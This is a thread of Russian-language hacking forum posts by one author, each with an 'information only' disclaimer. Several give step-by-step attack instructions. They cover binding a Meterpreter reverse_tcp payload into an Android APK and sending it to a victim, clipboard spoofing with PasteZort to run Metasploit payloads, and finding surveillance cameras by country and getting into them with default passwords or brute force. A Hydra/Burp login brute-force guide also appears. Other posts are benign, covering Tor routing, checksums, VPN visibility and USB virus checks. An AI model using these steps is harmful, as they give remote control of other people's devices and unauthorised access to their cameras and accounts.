Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 

 

 




#28220 Взлом Android смартфона

Отправлено по roguevad   28 Июль 2021 - 01:46 в Делимся опытом.

Приветствую, хакеры! В данной статье мы расскажем вам о том, как склеить .apk файл с метерпретером при помощи Apkmod, что позволит нам взламывать смартфон.

Нам понадобится:

  • .apk, с которым у нас будет склейка
  • Metasploit
  • Apkmod

Приступаем!

Установка Apkmod:

Сначала нужно скачать установщик:

   wget https://raw.githubus...master/setup.sh

051abec016957e89411e9.png

Затем вводим

   sh setup.sh

Ждем окончания установки

Склейка

Для примера я буду использовать прогу WiFi Map Pro (для наглядности переименовал в hackerplace.apk)

   apkmod -b hackerplace.apk -o WiFiMapPro.apk LHOST=ЗДЕСЬ СВОЙ АЙПИ LPORT=ТУТ ПОРТ

-b : файл к которому клеем пейлод

-o : выходной файл с пейлодом

Теперь переходим к Metasploit:

   msfconsole

Используем multi/handler:

   use exploit/multi/handler

Ставим пейлоад под Android:

   set payload android/meterpreter/reverse_tcp

Прописываем наш IP и Порт:

   set LHOST АЙПИ

   set LPORT ПОРТ

Запускаем:

   exploit

 

b7e6a52905a18d74c0090.png

 

Теперь скидываем жертве и смотрим на результат:

82ddbf676b6b0b9a86f64.png

 

На этом у нас все!

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28221 Что такое Brute force и как делать проверку на эту уязвимость с помощью прогр...

Отправлено по roguevad   29 Июль 2021 - 02:04 в Делимся опытом.

Brute force — это метод грубой силы, подбор [пароля] методом грубой силы атака, заключающаяся в поиске пароля из множества всех его возможных значений путём их полного перебора. Способ подбора паролей к компьютерной системе, в котором для получения хэшированных паролей используются автоматически генерируемые последовательности символов, т. е. перебираются их всевозможные комбинации до тех пор, пока пароль не будет подобран. При этом обычно учитывается наименьшая и наибольшая возможная длина пароля. 

Hydra — Утилита для подбора аутентификационных данных методом грубой силы (brute force). 

Burp Suite — это интегрированная платформа для выполнения тестов по безопасности веб-приложений. Её различные инструменты эффективно работают вместе для поддержки всего процесса тестирования, от составления карты сайта и анализа поверхности атаки приложения до поиска и эксплуатации уязвимостей безопасности. 

Команды для работы с приложением: 

R — Восстановить предыдущую прерванную/оборванную сессию

s — ПОРТ

— ЛОГИН (Единичный)

— ЛОГИН (Список)

— ПАРОЛЬ (Единичный)

P — ПАРОЛЬ (Список)

— Генерация паролей для брутфорса, наберите “-x -h” для помощи

o — ФАЙЛ

f — Выйти, когда пара логин/пароль подобрана

t — ЗАДАЧИ

w — ВРЕМЯ

F — Элемент, который укажет на не успешную авторизацию

H — Куки

И так, с инструментами ознакомились. Теперь давайте приступим к настройке всего флоу, чтоб можно было подобрать нужные нам данные.

 1. Для начала подготовим пул данных логинов(мыл) и паролей

 2. Откроем наш веб сайт, который мы проверяем в каком либо браузере

 3. Включаем Burp Suite 

Во вкладке Proxy->Intercept включаем кнопку Intercept is on

zYeYrEH-AEM.jpg?size=800x348&quality=96&

 

Во вкладке Proxy->Oprions настраиваем прокси на приложуху и на браузер в котором открыли сайт, чтоб перехватить запрос, который пойдет, при попытке войти.

Zsg_QeI1WbI.jpg?size=800x463&quality=96&

 

Во вкладку Proxy->Intercept->Raw получим все данные переданные при попытке авторизации через браузер

4. Идем в браузер и делаем какую-то авторизацию, которая будет не валидна, так как нам надо не только взять данные, которые передаются отправке запроса, но и нам нужно какою-то увидеть уведомляху, что авторизация не прошла, для того чтоб под нее подвязать нашу утилиту Hydra, чтоб она могла понимать авторизация прошла успешно или нет.

xuIkroYw81E.jpg?size=690x314&quality=96&

 

В данном примере у нас она такая. Можно взять даже часть с этого уведомления, 1 слово допустим.

ggqsS7GfvEE.jpg?size=800x298&quality=96&

 

5. Возвращаемся в Burp Suite и видим все нужные данные для формирования скрипта. Нам нужны такие типы данных с этого запроса:

- Какой тип запроса Post/Get

- Cookie пользователя

- Локаторы полей ввода и кнопки войти

scL4sUF2FVQ.jpg?size=800x381&quality=96&

 

6. Открываем консольку и начинаем лепить запросик. Последовательность операторов может быть любой. Но я расскажу какая у меня последовательность в этом запросе:

NztG8HTx7Zk.jpg?size=807x56&quality=96&s

 

hydra- вызов утилиты

-l либо -L логин либо их список

-p либо -P пароль либо их список

-f если хотите чтоб подбор закончился при первом нужном совпадении

-V показать в реалтайме как происходит подбор, какой логин к какому паролю из предоставленных списков

через какой протокол и какую тип запроса проходит при авторизации в данном случаи протокол http и запрос post-form

саб домен, в данном случаи /index/sub/ локаторы

OGjgnzDONOE.jpg?size=800x78&quality=96&s

 

F- в него вписать вывод при не валидных данных пользователя 

:H- кука 

7. Жмем запуск и ждем результатов 

Хорошо бы конечно, было бы если нас система заблочит как бота пытающегося взломать, но для этого есть мы, чтоб проверить на сколько наш проект защищен от таких штук. 

Как защитится:

  1. Добавить капчу 

2. Добавить двухэтапную аутентификацию 

3. Ввести лимиты на поступление запросов с одного IP

 

 




#28222 Анонимно выходим в сеть с помощью Tor-Router

Отправлено по roguevad   31 Июль 2021 - 01:56 в Делимся опытом.

Приветствую, хакеры! Tor Router позволяет вам использовать сеть TOR в качестве прозрачного прокси-сервера и отправлять весь ваш трафик, включая DNS-запросы, через TOR. Tor router не трогает системные файлы, как это делают остальные инструменты для маршрутизации трафика. Причина этого в том, что нет необходимости изменять файлы для маршрутизации трафика, так как сбой в скрипте может нарушить ваше системное соединение.

 

Установка

 

   apt-get && apt-get upgrade

   sudo apt install tor

   git clone https://github.com/e...dshl/tor-router

   cd tor-router/files

 

Открываем файл torrc через текстовый редактор:

   sudo nano /etc/tor/torrc

 

И добавляем в файл следующий текст:

   Seting up TOR transparent proxy for tor-router

   VirtualAddrNetwork 10.192.0.0/10

   AutomapHostsOnResolve 1

   TransPort 9040

   DNSPort 5353

 

После этого перезапускаем службу TOR:

   sudo systemctl restart tor

 

Использование

 

   ./tor-router

 

Теперь весь ваш трафик проходит через сеть TOR. Проверить это можно на на check.torproject.org. Для тестов DNS: dnsleaktest.com

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28223 Что такое контрольные суммы (хеш-суммы)?!

Отправлено по roguevad   04 Август 2021 - 12:19 в Делимся опытом.

Приветствую, хакеры! Очень часто на сайтах разных дистрибутивов и софта можно увидеть колонки с названием SHA256Sum или MD5Sum. Это контрольные суммы (или хеш-суммы). Контрольные суммы позволяют проверить подлинность и целостность файла. Также, по контрольным суммам очень легко искать файлы в поисковых системах.

 

Зачем нужны контрольные суммы?

Например, если файл был скачан не полностью, или файл был частично поврежден или полностью подменен на выходе он будет иметь другую контрольную сумму.

 

Скачивая образ дистрибутива с сайта можно сверить контрольную сумму. При условии что все прошло без каких-либо происшествий с файлом контрольная сумма должна совпадать.  Это особо актуально, если приходится работать в небезопасных и нестабильных сетях. Значение контрольной суммы меняется, если хотя бы один бит файла изменился.

 

В Kali Linux есть две утилиты: sha256sum и md5sum. С названия становиться очевидным что первая утилита использует алгоритм SHA-256, а вторая — MD5. Иногда, на сайтах можно увидеть сразу две контрольных суммы файла, а иногда только одну.  Для проверки контрольных сумм достаточно выполнить команды:

   md5sum <filename>

   sha256sum <filename>

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28224 Защищаемся от кейлоггеров

Отправлено по roguevad   05 Август 2021 - 01:26 в Делимся опытом.

Приветствую, хакеры! Если вы случайно скачаете малварь, то вместе с ним к вашему компьютеру могут привязаться кейлогер. Это такие программы, которые запоминают все нажатия клавиш на клавиатуре. Например, когда вы вводите свой логин и пароль для входа во ВКонтакте или Сбербанк Онлайн. Так кейлоггер незаметно записывает эти данные и получает доступ к вашим банковским счетам, соцсетям и прочим сервисам.

 

Работает это не очень сложно: кейлоггер просто выдаёт себя за устройство, которое принимает все нажатия клавиш. Такие кибератаки очень опасны, ведь у вас могут украсть деньги, пароли, разрушить кредитный рейтинг или шантажировать вас личной информацией.

 

Чтобы обнаружить и избавиться от этих вредителей, используйте инструменты вроде Ghostpress. Он работает в фоновом режиме и автоматически блокирует практически все кейлоггеры. Его база настолько обширна, что Ghostpress почти гарантирует защиту от этих вредоносных программ.

 

Программа имеет как бесплатный, так и платный функционал, а также доступна на Windows.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28225 Что видит ваш провайдер, когда вы подключены к VPN.

Отправлено по roguevad   07 Август 2021 - 02:02 в Делимся опытом.

Приветствую, хакеры! К VPN подключаются в том числе, чтобы ускорить и обезопасить соединение — пользователям не нравится, что теоретически кто угодно может отслеживать обычный трафик и видеть, какие файлы вы скачивали, куда заходили и зачем. Но разберемся, что же видит ваш провайдер при подключении через виртуальную частную сеть.

Под конфиденциальной информацией будем понимать не только переписку с другими пользователями, но и посещенные сайты, скаченные файлы, историю поиска.

Что увидит провайдер при VPN-подключении:

  • VPN-соединение: провайдер увидит подключение к VPN-серверу, но не будет знать, что вы делаете в сети. Информация зашифрована и для ISP недоступна. 
  • IP-адрес сервера: провайдер сможет понять, что от пользователя уходят какие-то данные к серверу VPN, но дальнейший маршрут пакетов данных ему неизвестен. 
  • Использование трафика: провайдер может узнать объем принятой и отправленной информации, но не ее содержание. 
  • Время соединения: ISP увидит, когда вы подключились к интернету и вышли из сети. 
  • Протоколы и порты VPN: провайдер поймет, что используется VPN, поскольку будут задействованы порты и протоколы, характерные для виртуальных частных сетей.

 

При VPN-подключении провайдер не увидит вашей конфиденциальной информации

Чего провайдер не увидит: 

  • сайты, которые вы посещали, 
  • файлы, которые вы скачивали, 
  • что вы публиковали в социальных сетях, 
  • историю поиска.

Конечно, виртуальная частная сеть не гарантирует 100% анонимность в сети, но дает высокую степень защиты и сохранения конфиденциальности информации. Провайдер может понять, что пользователь использует технологию VPN, но что именно вы делаете, куда заходите, что ищете, пишете, отправляете и скачиваете, для него останется тайной.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 




#28226 Взлом компьютера с помощью буфера обмена

Отправлено по roguevad   09 Август 2021 - 02:05 в Делимся опытом.

Приветствую, хакеры! В данной статье хочу рассказать, как взломать компьютер с помощью буфера обмена, для этого нам понадобится утилита PasteZort. Утилита PasteZort позволяет производить спуффинг буфера обмена:

пользователь с сайта хочет скопировать одну команду (например, cd /C), а вместо этой команды в буфер обмена копируется другая команда с зашифрованным содержимым (например, XGWoongq1={pdqe--downdel{c}}).

 

Если пользователь вставит данную команду, то он даже не успеет понять, что что-то произошло, так как терминал моментально очистится, и на его компьютере уже будет запущен payload от Metasploit, который откроет удаленный доступ для злоумышленника.

 

Данную атаку можно провести с помощью Kali Linux или Termux или же на других подобных платформах.

 

Установка:

 

   git clone https://github.com/ZettaHack/PasteZort

 

Запуск:

 

   cd PasteZort

   chmod +x ./PasteZ0rt

   ./PasteZ0rt

 

Все, инструмент запустился. Нам нужно выбрать ОС жертвы и мы готовы ко взлому любого компьютера. Очень простая и интересная схема взлома.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28227 Как узнать есть ли вирус на флешке

Отправлено по roguevad   10 Август 2021 - 10:38 в Делимся опытом.

Приветствую, хакеры! В этой статье я вам расскажу о методе, который позволит узнать вам есть ли вирус на вашей флешке. Суть метода заключается в создании иконки для флешки со специальным файлом. Если на флешку попадет вирус то он перепишет файл и наша иконка пропадет, тем самым мы поймем, что поймали вирус и сможем его без каких-либо проблем удалить.

1. Создаем на флешке текстовый документ, затем переименовываем его в autorun.inf

 

2. Далее находим иконку в интернете или создаем свою с размером 64х64. Скачать можно тут, сделать иконку тут

 

3. Открываем файл autorun.inf через блокнот и пишем:

[autorun]

icon=1.ico

где вместо "1" должно быть написано имя выбранной вами иконки. Сохраняем и закрываем autorun.inf

 

4. Теперь копируем иконку на флешку

 

5. Закрываем флешку, вытаскиваем и вставляем обратно. 

Если на вашу флешку попадет вирус, то он перепишет autorun.inf и ваша иконка не будет отображаться - это и будет признаком вируса, после этого ее можно форматировать и избавлять от любого вируса, что обеспечит вам безопасность данных.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 




#28231 Как взломать камеры видеонаблюдения

Отправлено по roguevad   11 Август 2021 - 10:26 в Делимся опытом.

Приветствую, хакеры! В данной статье я хочу рассказать о способе взлома камер видеонаблюдения. Метод крайне прост, поэтому с ним справится любой человек. Для реализации задуманного нам потребуется Termux! Для его использования рекомендую установить Kali Linux, самая удобная ОС для подобных дел. После этого можно приступать и начинать подготовку к взлому, устанавливаем инструментарий.

 

Для установки необходимого инструментария прописываем команды:

 

 install python3 

apt install git

git clone https://github.com/yan4ikyt/webhack/

cd webhack

bash install.sh

 

Использование инструментария происходит по следующей команде:

 

 WebHack.py

 

Как только набрали команду, вам предоставится возможность выбрать страну, после чего утилита выдаст IP камер. Далее данные адреса нужно будет вставить в браузер и просматривать. Половина камер из списка под паролем, но пароль может попасться стандартный (password / 1234), либо можно решить эту проблему брутфорсом, после этого вы можете просматривать камеры видеонаблюдения.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.